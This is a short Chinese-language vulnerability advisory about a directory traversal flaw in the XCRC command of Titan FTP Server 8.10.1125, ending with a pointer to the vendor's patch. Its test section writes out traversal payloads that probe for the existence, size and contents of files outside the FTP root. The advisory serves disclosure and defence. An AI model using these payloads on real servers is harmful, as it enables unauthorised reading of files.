受影响系统:
South River Technologies Titan FTP Server 8.10.1125
描述:
Titan FTP Server是一款FTP服务程序。
Titan FTP Server在处理XCRC命令时存在输入验证错误,远程攻击者可以通过目录遍历攻击判断FTP根目录外是否存在特定文件及其大小,或暴力猜测其内容。
<*来源:Bill Finlayson (bill@accensussecurity.com)
链接:http://secunia.com/advisories/40237/
http://marc.info/?l=bugtraq&m=127671584132537&w=2
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
xcrc ..//..//..//..//a.txt 1 <some huge number>
xcrc ..//..//..//..//a.txt 1 2
xcrc ..//..//..//..//a.txt 1 3
…
xcrc ..//..//..//..//a.txt 1 <filesize>
建议:
厂商补丁:
South River Technologies
————————
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.southrivertech.com/index.php?pg=./products/titanftp/index
0 条评论。